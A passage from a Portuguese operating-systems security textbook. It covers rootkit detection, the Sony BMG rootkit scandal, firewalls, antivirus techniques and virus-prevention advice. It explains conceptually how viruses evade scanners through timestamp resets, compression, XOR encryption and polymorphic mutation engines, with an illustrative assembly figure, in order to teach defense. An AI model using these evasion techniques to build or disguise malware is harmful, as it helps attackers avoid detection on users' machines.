remota ou a um site que fornece uma base de tempo pre- 
cisa. Como o detector precisa apenas mensurar intervalos 
de tempo (por exemplo, quanto tempo leva para executar 
um bilhão de leituras de um registrador protegido), o des- 
vio entre o relógio local e o relógio remoto não importa. 

Se nenhum hipervisor foi colocado entre o hardware 
e o sistema operacional, então o rootkit poderia estar 
escondendo-se dentro do sistema operacional. É difícil 
detectá-lo inicializando o computador, tendo em vista 
que o sistema operacional não pode ser confiado. Por 
exemplo, o rootkit poderia instalar um grande número 
de arquivos, todos cujos nomes começam com “$$$ ” e 
quando lendo diretórios em prol de programas do usuá- 
rio, nunca relatam a existência de tais arquivos. 

Uma maneira de detectar rootkits sob essas circuns- 
tâncias é inicializar o computador a partir de um meio 
externo confiável como o DVD original ou pen-drive. 
Então o disco pode ser escaneado por um programa an- 
tirootkit sem medo de que o próprio rootkit vá interferir 
com a varredura. Alternativamente, um resumo cripto- 
gráfico pode ser feito de cada arquivo no sistema ope- 
racional e estes comparados a uma lista feita quando 
o sistema foi instalado e armazenado fora do sistema 
onde ele não poderia ser alterado. Por outro lado, se 
nenhum desses resumos foi feito originalmente, eles 
podem ser calculados a partir da instalação do USB e 
do CD-ROM/DVD agora, ou os próprios arquivos sim- 
plesmente comparados. 

Rootkits em bibliotecas e programas de aplicação 
são mais difíceis de esconder, mas se o sistema opera- 
cional foi carregado a partir de um meio externo e puder 
ser confiado, seus resumos podem também ser compa- 
rados a resumos conhecidos por serem corretos e arma- 
zenados em um pen-drive ou em CD-ROM. 
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Até o momento, a discussão tem sido a respeito de 
rootkits passivos, que não interferem com o software 
de detecção de rootkits. Há também rootkits ativos, que 
buscam e destroem o software de detecção do rootkit, 
ou pelo menos o modificam para sempre anunciar: 
“NENHUM ROOTKIT ENCONTRADO!”. Esses exi- 
gem medidas mais complicadas, mas felizmente ne- 
nhum rootkit ativo apareceu por aí ainda. 

Há duas escolas de pensamento a respeito do que 
fazer após um rootkit ter sido descoberto. Uma escola 
diz que o administrador do sistema deve comportar-se 
como um cirurgião tratando um câncer: cortá-lo fora 
muito cuidadosamente. A outra diz que tentar remover 
o rootkit é perigoso demais. Pode haver muitos frag- 
mentos ainda escondidos. De acordo com essa visão, a 
única solução é reverter para o último backup completo 
que se sabe que estava limpo. Se nenhum backup estiver 
disponível, uma nova instalação é necessária. 


O rootkit Sony 


Em 2005, a Sony BMG lançou uma série de CDs 
de áudio contendo um rootkit. Ele foi descoberto por 
Mark Russinovich (cofundador do site de ferramentas 
de administração Windows <www.sysinternals.com>), 
que estava então trabalhando no desenvolvimento de 
um detector de rootkits e ficou muito surpreso em en- 
contrar um rootkit no seu próprio sistema. Ele escreveu 
sobre isso no seu blog e logo a história estava por toda 
a internet e a mídia de massa. Estudos científicos fo- 
ram escritos a respeito dele (ARNAB e HUTCHISON, 
2006; BISHOP e FRINCKE, 2006; FELTEN e HAL- 
DERMAN, 2006; HALDERMAN e FELTEN, 2006; e 
LEVINE et al., 2006). Levou anos para o furor resul- 
tante passar. A seguir daremos uma rápida descrição do 
que aconteceu. 

Quando um usuário insere um CD na unidade de 
um computador Windows, este procura por um arquivo 
chamado autorun.inf, que contém uma lista de ações a 
serem tomadas, normalmente começando algum pro- 
grama no CD (como um assistente de instalação). Nor- 
malmente, CDs de áudio não têm esses arquivos, pois 
CD players dedicados os ignoram se presentes. Aparen- 
temente, algum gênio na Sony achou que ele acabaria 
de maneira inteligente com a pirataria na música colo- 
cando um arquivo autorun.inf em alguns dos seus CDs, 
que ao serem inseridos em um computador imediata e 
silenciosamente instalavam um rootkit de 12 MB. Então 
um acordo de licença foi exibido, que não mencionava 
nada sobre o software sendo instalado. Enquanto a li- 
cença estava sendo exibida, o software da Sony conferia 


para ver se algum dos 200 programas de cópia conheci- 
dos estava sendo executado, e se afirmativo, comanda- 
va o usuário para pará-los. Se o usuário concordava com 
a licença e parava todos os programas de cópia, a mú- 
sica tocaria; de outra maneira, ela não tocaria. Mesmo 
no caso de o usuário ter declinado a licença, o rootkit 
seguia instalado. 

O rootkit funcionava da seguinte forma. Ele inseria no 
núcleo do Windows uma série de arquivos cujos nomes 
começavam com $sys$. Um deles era um filtro que inter- 
ceptava todas as chamadas de sistema para a unidade de 
CD-ROM e proibia todos os programas exceto o player 
de música da Sony de ler o CD. Essa ação tornou a cópia 
do CD para o disco rígido (que é legal) impossível. Outro 
filtro interceptava todas as chamadas que liam arquivos, 
processos e listagens de registros, e deletava todas as 
entradas, começando com $sys$ (mesmo de programas 
completamente não relacionados com a Sony e a música) 
a fim de esconder o rootkit. Essa abordagem é relativa- 
mente padrão para os projetistas de rootkits novatos. 

Antes de Russinovich descobrir o rootkit, ele já 
havia se instalado amplamente, algo que não chega a 
surpreender já que ele estava em mais de 20 milhões 
de CDs. Dan Kaminsky (2006) estudou a extensão e 
descobriu que computadores em mais de 500 mil redes 
mundo afora haviam sido infectados pelo rootkit. 

Quando a notícia saiu, a reação inicial da Sony foi 
de que ela tinha todo o direito do mundo de proteger sua 
propriedade intelectual. Em uma entrevista para a Rádio 
Pública Nacional, Thomas Hesse, presidente do negócio 
digital global da Sony BMG, declarou: “A maioria das 
pessoas, creio, não faz nem ideia do que seja um rootkit, 
então porque nos preocuparmos com isso?” Quando essa 
resposta em si provocou uma tempestade, a Sony voltou 
atrás e liberou um patch que removia o mascaramento 
dos arquivos $sys$, mas mantinha o rootkit no seu lugar. 
Sob pressão crescente, a Sony por fim liberou um desins- 
talador no seu site, mas para consegui-lo, os usuários ti- 
nham de fornecer um endereço de e-mail e concordar que 
a Sony pudesse enviá-los material promocional no futuro 
(o que a maioria das pessoas chama de spam). 

Enquanto a história continuava a se desenrolar, fi- 
cou-se sabendo que o desinstalador da Sony continha 
falhas técnicas que tornavam o computador infectado 
altamente vulnerável a ataques na internet. Foi também 
revelado que o rootkit continha código de projetos de 
código aberto em violação aos seus direitos autorais 
(que permitiam o uso gratuito do software desde que o 
código-fonte fosse liberado). 

Além de ter sido um desastre de relações públicas 
sem precedentes, a Sony enfrentou problemas legais, 


também. O estado do Texas processou a Sony por violar 
sua lei antispyware, assim como por violar sua lei contra 
práticas comerciais enganosas (pois o rootkit era insta- 
lado mesmo que o usuário não concordasse com a licen- 
ça). Ações coletivas foram impetradas em 39 estados. 
Em dezembro de 2006, essas ações foram encerradas 
mediante acordo, quando a Sony concordou em pagar 
US$ 4,25 milhões, para parar de incluir o rootkit em 
CDs futuros e dar a cada vítima o direito de baixar três 
álbuns de um catálogo limitado de música. Em janeiro 
de 2007, a Sony admitiu que o seu software também 
monitorava secretamente os hábitos musicais dos usuá- 
rios e os reportava de volta para a Sony, em violação à 
lei norte-americana. Em um acordo com a FTC, a Sony 
concordou em pagar US$ 150 às pessoas cujos compu- 
tadores tinham sido danificados por seu software. 

A história do rootkit da Sony foi incluída para o 
benefício de qualquer leitor que possa acreditar que 
rootkits são uma curiosidade acadêmica sem implica- 
ções no mundo real. Uma busca na internet para “Sony 
rootkit” resultará em uma enorme quantidade de infor- 
mações adicionais. 


9.10 Defesas 


Com os problemas aparecendo por toda parte, há al- 
guma esperança de tornar nossos sistemas seguros? Na 
realidade, ela existe, e nas seções a seguir examinaremos 
algumas das maneiras como os sistemas podem ser pro- 
jetados e implementados para aumentar sua segurança. 
Um dos conceitos mais importantes é a defesa em pro- 
fundidade. Na essência, a ideia aqui é que você deve ter 
múltiplas camadas de segurança de maneira que se uma 
delas for violada, ainda existam outras para serem supe- 
radas. Pense a respeito de uma casa com uma cerca de 
ferro alta, pontiaguda e trancada em volta dela, detecto- 
res de movimento no jardim, duas trancas poderosas na 
porta da frente e um sistema computadorizado de alar- 
me contra arrombamento dentro. Embora cada técnica 
seja valiosa em si, para roubar a casa o arrombador teria 
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de derrotar todas elas. Sistemas de computadores ade- 
quadamente seguros são como essa casa, com múltiplas 
camadas de segurança. Examinaremos agora algumas 
das camadas. As defesas não são realmente hierárqui- 
cas, mas começaremos de certa maneira com as mais 
gerais externas e então as mais específicas. 


9.10.1 Firewalls 


A capacidade de conectar qualquer computador, 
em qualquer lugar, a qualquer outro computador, em 
qualquer lugar, é uma vantagem, mas com problemas. 
Embora exista muito material valioso na web, estar co- 
nectado à internet expõe um computador a dois tipos 
de perigos: que entram e que saem. Perigos que entram 
incluem crackers tentando entrar no computador, as- 
sim como vírus, spyware e outro malware. Perigos que 
saem incluem informações confidenciais como núme- 
ros de cartão de crédito, senhas, declarações de imposto 
de renda e todos os tipos de informações corporativas 
sendo enviadas. 

Em consequência, mecanismos são necessários para 
manter os “bons” bits dentro e os “maus” bits fora. 
Uma abordagem é usar um firewall, que é apenas uma 
adaptação moderna daquele antigo sistema medieval de 
segurança: cavar um fosso profundo em torno do seu 
castelo. Esse design forçava a todos que estivessem en- 
trando ou saindo do castelo a passar por uma única pon- 
te, onde eles poderiam ser inspecionados pela polícia 
de E/S. Com as redes, é possível o mesmo truque: uma 
empresa pode ter muitas LANs conectadas de maneiras 
arbitrárias, mas todo o tráfego para ou da empresa é for- 
çado a passar por uma ponte eletrônica, o firewall. 

Firewalls vêm em dois tipos básicos: hardware e 
software. Empresas com LANs para proteger normal- 
mente optam por firewalls de hardware; indivíduos em 
casa frequentemente escolhem firewalls de software. 
Vamos examinar os firewalls de hardware primeiro. Um 
firewall de hardware genérico está ilustrado na Figura 
9.32. Aqui a conexão (cabo ou fibra ótica) do provedor 


(FIGURA 9.32] Uma visão simplificada de um firewall de hardware protegendo uma rede local com três computadores. 
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de rede é conectado no firewall, que é conectado à LAN. 
Nenhum pacote pode entrar ou sair da LAN sem ser 
aprovado pelo firewall. Na prática, firewalls são muitas 
vezes combinados com roteadores, caixas de tradução 
de endereços de rede, sistemas de detecção de intrusão 
e outras coisas, mas nosso foco aqui será sobre a funcio- 
nalidade do firewall. 

Firewalls são configurados com regras descreven- 
do o que é permitido entrar e o que é permitido sair. O 
proprietário do firewall pode mudar as regras, comu- 
mente através de uma interface na web (a maioria dos 
firewalls tem um minisservidor da web inserido que 
permite isso). No tipo mais simples de firewall, o fi- 
rewall sem estado, o cabeçalho de cada pacote passan- 
do é inspecionado e uma decisão é tomada para passar 
ou descartar o pacote com base somente na informação 
no cabeçalho e nas regras do firewall. A informação no 
cabeçalho do pacote inclui os endereços de IP de des- 
tino e fonte, portas de destino e fonte, tipo de serviço e 
protocolo. Outros campos estão disponíveis, mas rara- 
mente aparecem nas regras. 

No exemplo da Figura 9.32, vemos três servidores, 
cada um com um endereço de IP único na forma de 
207.68.160.x, onde x é 190, 191 e 192, respectivamente. 
Esses são os endereços para os quais os pacotes devem 
ser enviados para chegar a esses servidores. Pacotes que 
chegam também contêm um número de porta de 16 
bits, que especifica quais processos na máquina rece- 
bem o pacote (um processo pode ouvir em uma porta 
pelo tráfego que chega). Algumas portas têm serviços 
padrão associados com elas. Em particular, a porta 80 
é usada para a web, a porta 25 é usada para e-mail e a 
porta 21 é usada para serviço de FTP (transferência de 
arquivos), mas a maioria dos outros estão disponíveis 
para serviços definidos pelo usuário. Sob essas condi- 
ções, o firewall pode ser configurado como a seguir: 


P address Port Action 
207.68.160.190 80 Accept 
207.68.160.191 25 Accept 
207.68.160.192 21 Accept 
j i Deny 


Essas regras permitem que os pacotes cheguem à 
máquina 207.68.160.190, mas somente se eles forem 
endereçados para a porta 80; todas as outras portas 
nessa máquina não têm permissão, e os pacotes envia- 
dos para elas serão silenciosamente descartados pelo 
firewall. Similarmente, pacotes podem ir para os ou- 
tros dois servidores se endereçados para as portas 25 e 
21, respectivamente. Todo o outro tráfego é descartado. 


Esse conjunto de regras torna dificil para um atacante 
ter acesso à LAN, exceto pelos três serviços públicos 
sendo oferecidos. 

Apesar do firewall, ainda é possível atacar a LAN. 
Por exemplo, se o servidor na web é apache e o 
cracker descobriu um defeito em apache, isso pode ser 
explorado, ele poderia ser capaz de enviar uma URL 
muito longa para 207.68.160.190 na porta 80 e forçar 
um transbordamento de buffer, assumindo desse modo 
uma das máquinas dentro do firewall, que poderia en- 
tão ser usada para lançar um ataque a outras máquinas 
na LAN. 

Outro ataque potencial é escrever e publicar um jogo 
de múltiplos jogadores e conseguir que ele seja ampla- 
mente aceito. O software do jogo precisa de alguma 
porta para conectar-se com os outros jogadores, então 
o projetista do jogo pode escolher um, digamos, 9876, 
e dizer aos jogadores para mudar suas configurações de 
firewall para permitir o tráfego que chega e sai dessa 
porta. As pessoas que abriram essa porta estão sujeitas 
agora a ataques nela, o que pode ser fácil especialmente 
se o jogo contiver um cavalo de Troia que aceite deter- 
minados comandos de longe e apenas os execute cega- 
mente. Mas mesmo que o jogo seja legítimo, ele pode 
conter defeitos potencialmente exploráveis. Quanto 
mais portas estiverem abertas, maior a chance de um 
ataque ter sucesso. Toda brecha aumenta as chances de 
um ataque passar por ali. 

Além dos firewalls sem estado, há também os fi- 
rewalls com estado, que controlam as conexões e em 
que estado elas são executadas. Esses firewalls são 
melhores para derrotar determinados tipos de ata- 
ques, especialmente aqueles relacionados a estabele- 
cer conexões. No entanto, outros tipos de firewalls 
implementam um IDS (Intrusion Detection System 
— Sistema de detecção de intrusão), no qual o fi- 
rewall inspeciona não somente os cabeçalhos dos pa- 
cotes, mas também o conteúdo deles, procurando por 
materiais suspeitos. 

Firewalls de software, às vezes chamados firewalls 
pessoais, fazem a mesma coisa que os firewalls de hard- 
ware, mas em software. Eles são filtros anexados ao có- 
digo de rede dentro do núcleo do sistema operacional 
e filtram pacotes da mesma maneira que o firewall de 
hardware. 


9.10.2 Antivírus e técnicas antivírus 


Firewalls tentam manter intrusos fora do computa- 
dor, mas eles podem falhar de várias maneiras, como 
descrito anteriormente. Nesse caso, a próxima linha de 


defesa compreende os programas antimalware, muitas 
vezes chamados de programas antivírus, embora mui- 
tos deles também combatam vermes e spyware. Vírus 
tentam esconder-se e usuários tentam encontrá-los, o 
que leva a um jogo de gato e rato. Nesse sentido, vírus 
são como rootkits, exceto que a maioria dos escritores 
de vírus enfatiza a rápida disseminação do vírus em vez 
de brincar de esconde-esconde na mata como fazem os 
rootkits. Vamos examinar algumas das técnicas usadas 
por softwares antivírus e também como Virgil, o escri- 
tor de vírus, responde a elas. 


Varreduras para busca de vírus 


Claramente, o usuário médio comum não encon- 
trará muitos vírus que façam o seu melhor para es- 
conder-se, então um mercado desenvolveu-se para o 
software de vírus. A seguir discutiremos como esse 
software funciona. Empresas de software antivírus 
têm laboratórios nos quais cientistas dedicados traba- 
lham longas horas rastreando e compreendendo novos 
vírus. O primeiro passo é o vírus infectar um progra- 
ma que não faz nada, muitas vezes chamado de um 
arquivo cobaia (goat file), para conseguir uma cópia 
do vírus em sua forma mais pura. O passo seguinte é 
fazer uma listagem exata do código do vírus coloca- 
-la em seu banco de dados de vírus conhecidos. As 
empresas competem pelo tamanho dos seus bancos 
de dados. Inventar novos vírus apenas para aumentar 
o seu banco de dados não é considerado uma atitude 
esportiva. 

Uma vez que um programa antivírus tenha sido 
instalado na máquina de um cliente, a primeira coisa 
que ele faz é varrer todos os arquivos executáveis no 
disco procurando por qualquer um dos vírus no banco 
de dados de vírus conhecidos. A maioria das empresas 
antivírus tem um site do qual os clientes podem baixar 
as descrições de vírus recentemente descobertos nos 
seus bancos de dados. Se o usuário tem 10 mil arqui- 
vos e o banco de dados tem 10 mil vírus, é necessária 
alguma programação inteligente para fazê-lo ir mais 
rápido, é claro. 

Como variantes menores dos vírus conhecidos apa- 
recem a toda hora, é necessária uma pesquisa difusa, 
para assegurar que uma mudança de 3 bytes para um 
vírus não deixe escapar a sua detecção. No entanto, bus- 
cas difusas não são somente mais lentas que as buscas 
exatas; elas podem provocar alarmes falsos (falsos po- 
sitivos), isto é, avisos sobre arquivos legítimos que ape- 
nas contêm algum código vagamente similar a um vírus 
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relatado no Paquistão sete anos atrás. O que o usuário 
deve fazer com a mensagem: 


AVISO: Arquivo xyz.exe pode conter o vírus lahore- 
-9x. Excluir o arquivo? 


Quantos mais vírus existirem no banco de dados 
e mais amplo o critério para declarar um ataque, mais 
alarmes falsos ocorrerão. Se ocorrerem alarmes falsos 
demais, o usuário desistirá incomodado. Mas a varredura 
por vírus insistir em detectar apenas similaridades muito 
próximas, ela pode deixar passar alguns vírus modifi- 
cados. Acertar isso é um equilíbrio heurístico delicado. 
Idealmente, o laboratório deveria tentar identificar algum 
código central no vírus, que não tenha chance de mudar, 
e usá-lo como a assinatura de vírus para procurar. 

Só porque o disco foi declarado livre de vírus na 
semana passada não significa que ele ainda esteja, de 
maneira que a varredura por vírus tenha de ser execu- 
tada frequentemente. Como a varredura é lenta, é mais 
eficiente conferir apenas aqueles arquivos que tenham 
sido modificados desde a data da última varredura. 
O problema é que um vírus inteligente pode restabele- 
cer a data de um arquivo infectado para sua data original 
para evitar detecção. A resposta do programa antivírus 
a isso é conferir a data que o diretório foi modificado 
pela última vez. A resposta do vírus a isso é restabelecer 
a data do diretório também. Esse é o começo do jogo de 
gato e rato aludido. 

Outra maneira para o programa antivírus detectar 
a infecção do arquivo é registrar e armazenar os com- 
primentos de todos os arquivos. Se um arquivo cresceu 
desde a última conferência, ele pode estar infectado, 
como mostrado na Figura 9.33(a-b). No entanto, um 
vírus realmente inteligente pode evitar a detecção com- 
primindo o programa e trazendo o arquivo para o seu 
comprimento original a fim de tentar mascará-lo. Para 
que esse esquema funcione, o vírus deve conter ambos 
os procedimentos de compressão e de descompressão, 
como mostrado na Figura 9.33(c). Outra maneira para 
o vírus tentar escapar à detecção é certificar-se de que 
sua representação no disco não se pareça com sua re- 
presentação no banco de dados do software antivírus. 
Uma maneira de atingir essa meta é criptografar-se com 
uma chave diferente para cada arquivo infectado. Antes 
de fazer uma nova cópia, o vírus gera uma chave crip- 
tográfica de 32 bits, por exemplo, aplicando XOR ao 
horário atual do dia com os conteúdos de, por exemplo, 
palavras de memória 72.008 e 319.992. Ele então apli- 
ca XOR no seu código com sua chave, palavra por pa- 
lavra, para produzir o vírus criptografado armazenado 
no arquivo infectado, como ilustrado na Figura 9.33(d). 
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A chave é armazenada no arquivo. Por questões de segu- 
rança, colocar a chave no arquivo não é ideal, mas a meta 
aqui é enganar a varredura do vírus, não evitar que os 
cientistas dedicados no laboratório de antivírus revertam 
a engenharia do código. É claro, para executá-lo, o vírus 
tem primeiro de criptografar-se, de maneira que ele pre- 
cisa de uma função de criptografia no arquivo também. 

Esse esquema ainda não é perfeito porque os proce- 
dimentos de compressão, descompressão, criptografia e 
decriptação são os mesmos em todas as cópias, de ma- 
neira que o programa do antivírus pode simplesmente 
usá-los como a assinatura do vírus a ser varrida com 
o scanner. Esconder os procedimentos de compressão, 
descompressão e criptografia é fácil: eles são simples- 
mente criptografados juntamente com o resto do vírus, 
como mostrado na Figura 9.33(e). O código de decrip- 
tação não pode ser criptografado, no entanto. Ele tem de 
realmente executar no hardware para decriptar o resto 
do vírus, de maneira que ele tem de estar presente em 
texto puro. Programas de antivírus sabem disso, então 
eles saem atrás do procedimento de decriptação. 

No entanto, Virgil gosta de ter a última palavra, en- 
tão a essa altura ele procede como a seguir. Suponha 
que o procedimento de decriptação precise de uma pla- 
taforma para realizar o cálculo 


X=(A+B+C-4) 


O codigo de assembly direto para esse calculo para 
um computador genérico de dois endereços é mostra- 
do na Figura 9.34(a). O primeiro endereço é a fonte; o 
segundo é o destino, então MOV A,R1 se desloca da va- 
riável A para o registro R1. O código na Figura 9.34(b) 
faz a mesma coisa, apenas de maneira menos eficiente 


por causa das instruções de nenhuma operação (NOP) 
entremeadas no código real. 

Mas não terminamos ainda. Também é possível 
disfarçar o código criptográfico. Há muitas maneiras 
de representar NOP. Por exemplo, acrescentar O ao re- 
gistrador, fazendo um OR consigo mesmo, deslocá-lo 
à esquerda O bit e saltar para a próxima instrução não 
dão resultado algum. Desse modo, o programa da Figu- 
ra 9.34(c) é funcionalmente o mesmo que o da Figura 
9.34(a). Quando copiando a si mesmo, o vírus poderia 
usar a Figura 9.34(c) em vez da Figura 9.34(a) e ainda 
assim trabalhar mais tarde quando executado. Um vírus 
que sofre mutação em cada cópia é chamado de vírus 
polimórfico. 

Agora suponha que R5 não seja necessário para nada 
durante a execução do seu fragmento de código. Então 
a Figura 9.34(d) também é equivalente à Figura 9.34(a). 
Por fim, em muitos casos, é possível trocar instruções 
sem mudar o que o programa faz, então terminamos 
com a Figura 9.34(e) como outro código de fragmen- 
to que é logicamente equivalente à Figura 9.34(a). Um 
fragmento de código que pode mudar uma sequência de 
instruções de máquina sem mudar a sua funcionalidade 
é chamado de um motor de mutação, e vírus sofistica- 
dos os contêm para promover mutação do decriptador 
de cópia para cópia. Mutações podem consistir da in- 
serção de códigos inúteis, mas inofensivos, permutando 
instruções, trocando registradores e substituindo uma 
instrução por uma equivalente. O próprio motor de mu- 
tação pode estar escondido, criptografando a si mesmo 
junto do corpo do vírus. 

Pedir ao pobre software antivirus para compre- 
ender que a Figura 9.34(a) até a Figura 9.34(e) são 


(FIGURA 9.33] (a) Um programa. (b) Um programa infectado. (c) Um programa comprimido infectado. (d) Um vírus encriptado. (e) Um 
vírus comprimido com código de compressão encriptado. 
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eTEN Exemplos de um vírus polimórfico. 
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MOV A,R1 MOV A,R1 MOV A,R1 MOV A,R1 MOV A,R1 
ADD B,R1 NOP ADD #0,R1 OR R1,R1 TST R1 
ADD C,R1 ADD B,R1 ADD B,R1 ADD B,R1 ADD C,R1 
SUB #4,R1 NOP OR R1,R1 MOV R1,R5 MOV R1,R5 
MOV R1,X ADD C,R1 ADD C,R1 ADD C,R1 ADD B,R1 
NOP SHL #0,R1 SHL R1,0 CMP R2,R5 
SUB #4,R1 SUB #4,R1 SUB #4,R1 SUB #4,R1 
NOP JMP .+1 ADD R5,R5 JMP .+1 
MOV R1,X MOV R1,X MOV R1,X MOV R1,X 
MOV R5,Y MOV R5,Y 


(a) (b) (c) 


todas equivalentes é pedir demais, especialmente se o 
motor de mutação tiver muitas cartas na sua manga. 
O software de antivírus pode analisar o código para ver 
o que ele faz, e até tentar simular a operação do código, 
mas lembre-se de que ele pode ter milhares de vírus e 
milhares de arquivos para analisar, então ele não tem 
muito tempo para teste ou executará de maneira terri- 
velmente lenta. 

Como nota, o armazenamento da variável Y foi in- 
serido apenas para tornar mais difícil detectar que o 
código relacionado a R5 é um código nulo, isto é, não 
faz nada. Se outros fragmentos de código lerem e escre- 
verem Y, o código parecerá perfeitamente legítimo. Um 
motor de mutação bem escrito que gere bons códigos 
polimórficos pode provocar pesadelos em escritores de 
softwares antivírus. O único lado bom disso é que é difi- 
cil de escrever um motor desses, então todos os amigos 
de Virgil usam esse código, o que significa que não há 
muitos códigos diferentes em circulação — ainda. 

Até o momento falamos sobre apenas tentar reco- 
nhecer vírus em arquivos executáveis infectados. Além 
disso, o scanner antivírus tem de conferir o MBR, se- 
tores de inicialização, lista de setores ruins, memória 
flash, memória CMOS e mais; porém, e se houver um 
vírus residente na memória atualmente executando? 
Isso não será detectado. Pior ainda, suponha que o vírus 
em execução esteja monitorando todas as chamadas do 
sistema. Ele pode facilmente detectar que o programa 
antivírus está lendo o setor de inicialização (para confe- 
rir se há vírus). A fim de enganar o programa antivírus, 
o vírus não faz a chamada de sistema. Em vez disso 
ele simplesmente retorna ao verdadeiro setor de inicia- 
lização do seu lugar de esconderijo na lista de blocos 
ruins. Ele também faz uma nota mental para infectar de 
novo todos os arquivos quando o scanner do vírus tiver 
terminado. 

Para evitar ser logrado por um vírus, o programa 
antivírus pode fazer leituras físicas no disco, driblan- 
do o sistema operacional. No entanto, isso exige que os 


(d) (e) 


drivers de dispositivos para SATA, USB, SCSI e outros 
discos comuns estejam embutidos, tornando o progra- 
ma antivírus menos portátil e sujeito a falhas em com- 
putadores com discos incomuns. Além disso, como é 
possível evitar o sistema operacional para ler o setor de 
inicialização, mas ao evitá-lo, ler todos os arquivos exe- 
cutáveis não é possível, há também algum perigo que o 
vírus possa produzir dados fraudulentos sobre arquivos 
executáveis. 


Verificadores de integridade 


Uma abordagem completamente diferente à detec- 
ção de vírus é a verificação de integridade. Um pro- 
grama antivírus que funciona dessa maneira primeiro 
varre o disco rígido para vírus. Assim que ele se conven- 
ce de que o disco está limpo, ele calcula uma soma de 
verificação (checksum) para cada arquivo executável. 
O algoritmo de soma de verificação poderia ser algo tão 
simples quanto tratar todas as palavras no programa de 
texto como inteiros de 32 ou 64 bits e somá-los, mas 
este também pode ser um resumo criptográfico quase 
impossível de se inverter. Ele então escreve a lista de 
somas de verificação para todos os arquivos relevantes 
em um diretório para um arquivo, checksum, naquele 
diretório. Da próxima vez que ele executar, ele recalcula 
todas as somas de verificação e vê se elas casam com o 
que está no arquivo checksum. Um arquivo infectado 
aparecerá imediatamente. 

O problema é que Virgil não vai aceitar isso sem 
reagir. Ele pode escrever um vírus que remove o arqui- 
vo checksum. Pior ainda, ele pode escrever um vírus 
que calcula a soma de verificação do arquivo infec- 
tado e substitui a velha entrada no arquivo checksum. 
Para proteger-se contra esse tipo de comportamento, 
o programa antivírus pode tentar esconder o arquivo 
checksum, mas é improvável que isso funcione, pois 
Virgil pode estudar o programa de antivírus cuidado- 
samente antes de escrever o vírus. Uma ideia melhor 
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é assina-lo digitalmente para tornar uma violação facil 
de ser detectada. Idealmente, a assinatura digital deve 
envolver o uso de um cartão inteligente com uma cha- 
ve armazenada externamente que os programas não 
conseguem atingir. 


Verificadores comportamentais 


Uma terceira estratégia usada pelo software de an- 
tivírus é uma verificação comportamental. Com essa 
abordagem o programa antivírus vive na memória en- 
quanto o computador estiver executando e pega todas 
as chamadas do sistema para si. A ideia é que ele pode 
então monitorar toda a atividade e tentar pegar qualquer 
coisa que pareça suspeita. Por exemplo, nenhum pro- 
grama normal deveria tentar sobrescrever o setor de ini- 
cialização, de maneira que a tentativa de fazê-lo é quase 
certamente parte de um vírus. De maneira semelhante, 
mudar a memória flash é algo altamente suspeito. 

Mas há também casos que não são tão claros. Por 
exemplo, sobrescrever um arquivo executável é algo 
peculiar de se fazer — a não ser que você seja um com- 
pilador. Se o software de antivírus detectar uma escrita 
dessas e emitir um aviso, temos a esperança que o usuá- 
rio saiba se sobrescrever um executável faz sentido no 
contexto do trabalho atual. Similarmente, o Word so- 
brescrever um arquivo .docx com um documento novo 
cheio de macros não é necessariamente o trabalho de 
um vírus. No Windows, programas podem desligar-se 
do seu arquivo executável e tornarem-se residentes na 
memória usando uma chamada de sistema especial. No- 
vamente, isso poderia ser algo legítimo, mas um aviso 
ainda poderia ser útil. 

Vírus não precisam esperar passivamente por um 
programa antivírus para eliminá-los, como gado sen- 
do levado para o abate. Eles podem lutar. Uma batalha 
particularmente empolgante pode ocorrer se um vírus 
e um antivírus residentes na memória encontrarem-se 
no mesmo computador. Anos atrás havia um jogo cha- 
mado Core Wars no qual dois programadores enfrenta- 
vam-se cada um largando um programa em um espaço 
de endereçamento vazio. Os programas revezavam-se 
sondando a memória, e o objetivo do jogo era locali- 
zar e acabar com o seu oponente antes que ele acabasse 
com você. À confrontação virus-antivirus se parece um 
pouco com isso, apenas que o campo de batalha é uma 
máquina de algum pobre usuário que não quer que isso 
realmente aconteça ali. Pior ainda, o vírus tem uma van- 
tagem, pois o escritor pode descobrir muito sobre o pro- 
grama de antivírus simplesmente comprando uma cópia 
dele. É claro, uma vez que o vírus esteja solto, a equipe 


antivírus pode modificar o seu programa, forçando Vir- 
gil a ir comprar uma nova cópia. 


Prevenção contra 0 virus 


Toda boa história precisa de uma moral. A moral 
dessa é: 


Melhor prevenir do que remediar. 


Evitar vírus em primeiro lugar é muito mais fácil 
do que tentar rastreá-los uma vez que eles tenham in- 
fectado um computador. A seguir algumas orientações 
básicas para usuários individuais, mas também algumas 
coisas que a indústria como um todo pode fazer para 
reduzir o problema consideravelmente. 

O que os usuários podem fazer para evitar uma infec- 
ção de vírus? Primeiro, escolha um sistema operacional 
que ofereça um alto grau de segurança, com uma forte 
separação dos modos usuário-núcleo e senhas de login 
separadas para cada usuário e o administrador do siste- 
ma. Nessas condições, um vírus que de certa maneira 
entre furtivamente não pode infectar os binários do siste- 
ma. Também, certifique-se de instalar logo as patches de 
segurança do fabricante. 

Segundo, instale apenas softwares baixados ou ori- 
ginais comprados de um fabricante confiável. Mesmo 
isso não é garantia, considerando que ocorreram muitos 
casos de empregados insatisfeitos inserirem vírus em 
um produto de software comercial, mas ajuda muito. 
Baixar softwares de sites amadores e BBSs oferecendo 
negócios bons demais é arriscado. 

Terceiro, compre um bom pacote de software de an- 
tivírus e use-o como orientado. Certifique-se de fazer 
atualizações regulares do site do fabricante. 

Quarto, não clique em URLs em mensagens, ou ane- 
xos para o e-mail e diga às pessoas para não as enviar 
para você. E-mails enviados como simples textos de 
ASCII são sempre seguros, mas anexos podem desen- 
cadear vírus quando abertos. 

Quinto, faça backups frequentes de arquivos-chave 
em um meio externo como pen-drives ou DVDs. Manter 
várias gerações de cada arquivo em uma série de mídias 
de backup. Dessa maneira, se descobrir um vírus, você 
pode ter uma chance de restaurar os arquivos como eles 
estavam antes de serem infectados. Restaurar o arquivo 
infectado de ontem não ajuda, mas restaurar a versão da 
semana passada pode ser que sim. 

Por fim, sexto, resista à tentação de baixar e executar 
softwares gratuitos e novos de uma fonte desconheci- 
da. Talvez exista uma razão para eles serem gratuitos 
— o produtor quer que o seu computador junte-se ao 


exército de zumbis. Se você tem um software de máqui- 
na virtual, executar um software desconhecido dentro 
de uma máquina virtual é seguro, no entanto. 

A indústria também deveria levar a ameaça dos vírus 
seriamente e mudar algumas práticas perigosas. Primei- 
ro, fazer sistemas operacionais simples. Quanto mais 
detalhes eles tiverem, mais brechas de segurança have- 
rá. Isso é certo. 

Segundo, esqueça o conteúdo ativo. Desligue o Java- 
script. Do ponto de vista de segurança, ele é um desas- 
tre. Para ver um documento que alguém lhe enviou, não 
deve ser necessário que você execute o seu programa. 
